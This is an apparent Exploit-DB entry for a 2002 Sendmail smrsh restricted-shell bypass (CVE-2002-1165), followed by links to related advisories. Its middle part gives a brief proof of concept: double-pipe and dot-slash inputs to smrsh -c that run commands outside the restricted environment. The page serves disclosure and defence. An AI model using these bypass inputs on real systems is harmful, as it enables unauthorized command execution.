Lucene search
Zen-parseEDB-ID:21884HistoryOct 01, 2002 - 12:00 a.m.
Sendmail 8.12.x - SMRSH Double Pipe Access Validation
2002-10-0100:00:00
zen-parse
www.exploit-db.com
18
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/5845/info
Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.
smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
OR one of the following types of commands:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command" Related
cve
cve
CVE-2002-1165
2002-10-11 04:00:00
packetstorm
packetstorm
idefense.smrsh.txt
2002-10-02 00:00:00
redhat
redhat
(RHSA-2002:259) sendmail security update
2003-02-06 00:00:00
nessus
nessus
RHEL 2.1 : sendmail (RHSA-2002:259)
2004-07-06 00:00:00
Mandrake Linux Security Advisory : sendmail (MDKSA-2002:083)
2004-07-31 00:00:00
Sendmail 8.8.8 - 8.12.7 Multiple Vulnerabilities (Bypass, OF)
2003-03-05 00:00:00
nvd
nvd
CVE-2002-1165
2002-10-11 04:00:00
ubuntucve
ubuntucve
CVE-2002-1165
2002-10-11 00:00:00
cvelist
cvelist
CVE-2002-1165
2002-10-03 04:00:00
debiancve
debiancve
CVE-2002-1165
2002-10-11 04:00:00
securityvulns
securityvulns
iDEFENSE Security Advisory 10.01.02: Sendmail smrsh bypass vulnerabilities
2002-10-02 00:00:00
openvas
openvas
Sendmail 8.8.8 - 8.12.7 Double Pipe Access Validation Vulnerability
2005-11-03 00:00:00
cert
cert